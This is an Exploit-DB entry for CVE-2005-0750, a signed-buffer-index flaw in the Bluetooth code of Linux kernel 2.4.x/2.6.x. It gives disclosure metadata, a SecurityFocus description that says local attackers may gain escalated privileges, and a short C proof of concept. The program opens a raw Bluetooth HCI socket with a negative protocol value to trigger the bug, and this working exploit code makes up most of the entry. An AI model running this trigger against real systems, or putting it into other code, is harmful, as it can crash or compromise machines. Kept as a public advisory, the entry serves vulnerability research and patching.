Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)

Author: ilja van sprundel
type: dos
platform: linux
port: 
date_added: 2005-03-28 
date_updated: 2019-03-07 
verified: 1 
codes: CVE-2005-0750;OSVDB-15084 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comlinux-2.6.11.1.tar.gz

/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/

source: https://www.securityfocus.com/bid/12911/info

A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.

A local attacker may leverage this issue to gain escalated privileges on an affected computer.
*/

#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

main()
{
        int ctl;

        /* Open HCI socket  */
        if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0)
        {
                perror("Can't open HCI socket.");
                exit(1);
        }
}